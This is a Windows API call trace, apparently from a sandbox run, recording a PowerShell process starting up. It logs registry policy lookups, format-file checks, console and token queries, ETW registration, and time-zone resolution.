	[0040.783] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d678 | out: phkResult=0x184b47d678*=0x0) returned 0x2
	[0040.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0041.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0041.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x335c8)) returned 1
	[0041.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\typesv3.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\typesv3.ps1xml", lpFilePart=0x0) returned 0x39
	[0041.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.079] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\typesv3.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\typesv3.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f361e4f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f361e4f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f361e4f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffa)) returned 1
	[0041.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0041.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3219)) returned 1
	[0041.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0041.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.087] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21bef)) returned 1
	[0041.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0041.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63b6)) returned 1
	[0041.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0041.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x441c4)) returned 1
	[0041.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", lpFilePart=0x0) returned 0x3f
	[0041.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33b9a)) returned 1
	[0041.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0041.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32684)) returned 1
	[0041.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0041.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1001)) returned 1
	[0041.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0041.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d6e0) returned 1
	[0041.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47d7c0 | out: lpFileInformation=0x184b47d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x210a)) returned 1
	[0041.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d6a0) returned 1
	[0041.154] GetConsoleCP () returned 0x1b5
	[0041.180] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184b47c5b0, nSize=0xfa | out: lpBuffer="\xc6c0\x4b47\x18") returned 0x0
	[0041.182] CreateFileW (lpFileName="CONOUT$" (normalized: "\\device\\condrv\\currentout"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274
	[0041.187] GetCurrentConsoleFontEx (in: hConsoleOutput=0x274, bMaximumWindow=0, lpConsoleCurrentFontEx=0x184b47d828 | out: lpConsoleCurrentFontEx=0x184b47d828) returned 1
	[0041.190] CoCreateGuid (in: pguid=0x184b47d8c8 | out: pguid=0x184b47d8c8*(Data1=0xf2621ae7, Data2=0x212a, Data3=0x47f9, Data4=([0]=0x85, [1]=0xfa, [2]=0x88, [3]=0x9d, [4]=0x74, [5]=0xd2, [6]=0x4d, [7]=0x87))) returned 0x0
	[0041.192] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d678 | out: phkResult=0x184b47d678*=0x0) returned 0x2
	[0041.193] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d678 | out: phkResult=0x184b47d678*=0x0) returned 0x2
	[0041.193] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x184b47d7d8 | out: lpConsoleScreenBufferInfo=0x184b47d7d8) returned 1
	[0041.194] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x184b47d7d8 | out: lpConsoleScreenBufferInfo=0x184b47d7d8) returned 1
	[0041.198] GetCurrentProcess () returned 0xffffffffffffffff
	[0041.198] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184b47d6e8 | out: TokenHandle=0x184b47d6e8*=0x278) returned 1
	[0041.201] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184b47d748 | out: TokenInformation=0x0, ReturnLength=0x184b47d748) returned 0
	[0041.201] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x15045596e90
	[0041.201] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x8, TokenInformation=0x15045596e90, TokenInformationLength=0x4, ReturnLength=0x184b47d748 | out: TokenInformation=0x15045596e90, ReturnLength=0x184b47d748) returned 1
	[0041.202] LocalFree (hMem=0x15045596e90) returned 0x0
	[0041.202] DuplicateTokenEx (in: hExistingToken=0x278, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x184b47d7a8 | out: phNewToken=0x184b47d7a8*=0x27c) returned 1
	[0041.203] CheckTokenMembership (in: TokenHandle=0x27c, SidToCheck=0x1504720dbe8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x184b47d7b0 | out: IsMember=0x184b47d7b0) returned 1
	[0041.203] CloseHandle (hObject=0x27c) returned 1
	[0041.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184b47c520, nSize=0xfa | out: lpBuffer="\xc630\x4b47\x18") returned 0x0
	[0041.255] SetConsoleCtrlHandler (HandlerRoutine=0x1505f5a3fec, Add=1) returned 1
	[0041.256] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24
	[0041.256] GetFileType (hFile=0x24) returned 0x2
	[0041.291] EtwEventRegister (in: ProviderId=0x15047215368, EnableCallback=0x1505f5a403c, CallbackContext=0x0, RegHandle=0x15047215348 | out: RegHandle=0x15047215348) returned 0x0
	[0041.291] EtwEventSetInformation (RegHandle=0x2601504553fa60, InformationClass=0x2, EventInformation=0x150472152f0, InformationLength=0x32) returned 0x0
	[0041.292] EnumerateTraceGuidsEx () returned 0x0
	[0041.293] GetCurrentProcessId () returned 0xff8
	[0041.296] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Winevt\\Publishers\\{5037b0a0-3a31-5cd2-ff19-103e9f160a74}", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47b958 | out: phkResult=0x184b47b958*=0x0) returned 0x2
	[0041.309] GetCurrentProcessId () returned 0xff8
	[0041.381] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184b47c800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184b47c800*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0xfb, [1]=0xf7, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0041.382] CoCreateGuid (in: pguid=0x184b47d658 | out: pguid=0x184b47d658*(Data1=0xd179dfd5, Data2=0xa973, Data3=0x4d95, Data4=([0]=0x96, [1]=0xe9, [2]=0x8, [3]=0x95, [4]=0x54, [5]=0x14, [6]=0x9f, [7]=0xfc))) returned 0x0
	[0041.387] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184b47d710*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184b47d710*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0xfb, [1]=0xf7, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0041.397] CsrIdentifyAlertableThread () returned 0x0
	[0041.423] CoTaskMemAlloc (cb=0x20c) returned 0x150455ac5b0
	[0041.424] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x150455ac5b0 | out: pszPath="C:\\Program Files") returned 0x0
	[0041.427] CoTaskMemFree (pv=0x150455ac5b0) 
	[0041.427] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x184b47bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10
	[0041.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184b47c290, nSize=0xfa | out: lpBuffer="\xc3a0\x4b47\x18") returned 0x0
	[0041.429] GetCurrentProcessId () returned 0xff8
	[0041.430] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xff8) returned 0x2e8
	[0041.430] GetProcessTimes (in: hProcess=0x2e8, lpCreationTime=0x1504722ecf0, lpExitTime=0x1504722ecf8, lpKernelTime=0x1504722ed00, lpUserTime=0x1504722ed08 | out: lpCreationTime=0x1504722ecf0, lpExitTime=0x1504722ecf8, lpKernelTime=0x1504722ed00, lpUserTime=0x1504722ed08) returned 1
	[0041.430] CloseHandle (hObject=0x2e8) returned 1
	[0041.431] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x184b47b1e8 | out: pTimeZoneInformation=0x184b47b1e8) returned 0x1
	[0041.434] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47b1b8 | out: phkResult=0x184b47b1b8*=0x2e8) returned 0x0
	[0041.434] RegQueryValueExW (in: hKey=0x2e8, lpValueName="TZI", lpReserved=0x0, lpType=0x184b47b1f8, lpData=0x0, lpcbData=0x184b47b1f0*=0x0 | out: lpType=0x184b47b1f8*=0x3, lpData=0x0, lpcbData=0x184b47b1f0*=0x2c) returned 0x0
	[0041.434] RegQueryValueExW (in: hKey=0x2e8, lpValueName="TZI", lpReserved=0x0, lpType=0x184b47b1f8, lpData=0x1504722f960, lpcbData=0x184b47b1f0*=0x2c | out: lpType=0x184b47b1f8*=0x3, lpData=0x1504722f960*, lpcbData=0x184b47b1f0*=0x2c) returned 0x0
	[0041.435] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47afc8 | out: phkResult=0x184b47afc8*=0x0) returned 0x2
	[0041.435] RegQueryValueExW (in: hKey=0x2e8, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x184b47b188, lpData=0x0, lpcbData=0x184b47b180*=0x0 | out: lpType=0x184b47b188*=0x1, lpData=0x0, lpcbData=0x184b47b180*=0x20) returned 0x0
	[0041.435] RegQueryValueExW (in: hKey=0x2e8, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x184b47b188, lpData=0x1504722fea8, lpcbData=0x184b47b180*=0x20 | out: lpType=0x184b47b188*=0x1, lpData="@tzres.dll,-320", lpcbData=0x184b47b180*=0x20) returned 0x0
	[0041.436] RegQueryValueExW (in: hKey=0x2e8, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x184b47b188, lpData=0x0, lpcbData=0x184b47b180*=0x0 | out: lpType=0x184b47b188*=0x1, lpData=0x0, lpcbData=0x184b47b180*=0x20) returned 0x0
	[0041.436] RegQueryValueExW (in: hKey=0x2e8, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x184b47b188, lpData=0x1504722ff18, lpcbData=0x184b47b180*=0x20 | out: lpType=0x184b47b188*=0x1, lpData="@tzres.dll,-322", lpcbData=0x184b47b180*=0x20) returned 0x0
	[0041.436] RegQueryValueExW (in: hKey=0x2e8, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x184b47b188, lpData=0x0, lpcbData=0x184b47b180*=0x0 | out: lpType=0x184b47b188*=0x1, lpData=0x0, lpcbData=0x184b47b180*=0x20) returned 0x0
	[0041.436] RegQueryValueExW (in: hKey=0x2e8, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x184b47b188, lpData=0x1504722ff88, lpcbData=0x184b47b180*=0x20 | out: lpType=0x184b47b188*=0x1, lpData="@tzres.dll,-321", lpcbData=0x184b47b180*=0x20) returned 0x0
	[0041.436] CoTaskMemAlloc (cb=0x20c) returned 0x150455a9f70
	[0041.436] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x150455a9f70 | out: pszPath="C:\\Windows\\system32") returned 0x0
	[0041.437] CoTaskMemFree (pv=0x150455a9f70) 
	[0041.437] CoTaskMemAlloc (cb=0x20c) returned 0x150455ac9f0
	[0041.437] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x184b47b1d8, pwszFileMUIPath=0x150455ac9f0, pcchFileMUIPath=0x184b47b1e0, pululEnumerator=0x184b47b1d0 | out: pwszLanguage=0x0, pcchLanguage=0x184b47b1d8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x184b47b1e0, pululEnumerator=0x184b47b1d0) returned 1
	[0041.450] CoTaskMemFree (pv=0x0) 
	[0041.450] CoTaskMemFree (pv=0x150455ac9f0) 
	[0041.451] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x15045710001
	[0041.462] CoTaskMemAlloc (cb=0x3ec) returned 0x150455c0a50
	[0041.462] LoadStringW (in: hInstance=0x15045710001, uID=0x140, lpBuffer=0x150455c0a50, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c
	[0041.462] CoTaskMemFree (pv=0x150455c0a50) 
	[0041.462] FreeLibrary (hLibModule=0x15045710001) returned 1
	[0041.463] CoTaskMemAlloc (cb=0x20c) returned 0x150455ac390
	[0041.463] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x150455ac390 | out: pszPath="C:\\Windows\\system32") returned 0x0
	[0041.463] CoTaskMemFree (pv=0x150455ac390) 
	[0041.463] CoTaskMemAlloc (cb=0x20c) returned 0x150455aaa10
	[0041.463] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x184b47b1d8, pwszFileMUIPath=0x150455aaa10, pcchFileMUIPath=0x184b47b1e0, pululEnumerator=0x184b47b1d0 | out: pwszLanguage=0x0, pcchLanguage=0x184b47b1d8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x184b47b1e0, pululEnumerator=0x184b47b1d0) returned 1
	[0041.464] CoTaskMemFree (pv=0x0) 
	[0041.464] CoTaskMemFree (pv=0x150455aaa10) 
	[0041.464] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x15045710001
	[0041.465] CoTaskMemAlloc (cb=0x3ec) returned 0x150455c0a50
	[0041.465] LoadStringW (in: hInstance=0x15045710001, uID=0x142, lpBuffer=0x150455c0a50, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17
	[0041.465] CoTaskMemFree (pv=0x150455c0a50) 
	[0041.465] FreeLibrary (hLibModule=0x15045710001) returned 1
	[0041.465] CoTaskMemAlloc (cb=0x20c) returned 0x150455a94d0
	[0041.465] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x150455a94d0 | out: pszPath="C:\\Windows\\system32") returned 0x0
	[0041.465] CoTaskMemFree (pv=0x150455a94d0) 
	[0041.465] CoTaskMemAlloc (cb=0x20c) returned 0x150455aa7f0
	[0041.465] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x184b47b1d8, pwszFileMUIPath=0x150455aa7f0, pcchFileMUIPath=0x184b47b1e0, pululEnumerator=0x184b47b1d0 | out: pwszLanguage=0x0, pcchLanguage=0x184b47b1d8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x184b47b1e0, pululEnumerator=0x184b47b1d0) returned 1
	[0041.466] CoTaskMemFree (pv=0x0) 
	[0041.466] CoTaskMemFree (pv=0x150455aa7f0) 
	[0041.466] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x15045710001
	[0041.467] CoTaskMemAlloc (cb=0x3ec) returned 0x150455c0a50
	[0041.467] LoadStringW (in: hInstance=0x15045710001, uID=0x141, lpBuffer=0x150455c0a50, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17
	[0041.467] CoTaskMemFree (pv=0x150455c0a50) 
	[0041.467] FreeLibrary (hLibModule=0x15045710001) returned 1
	[0041.467] RegCloseKey (hKey=0x2e8) returned 0x0
	[0041.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x15057081930, Length=0x20000, ResultLength=0x184b47b650 | out: SystemInformation=0x15057081930, ResultLength=0x184b47b650*=0x18520) returned 0x0
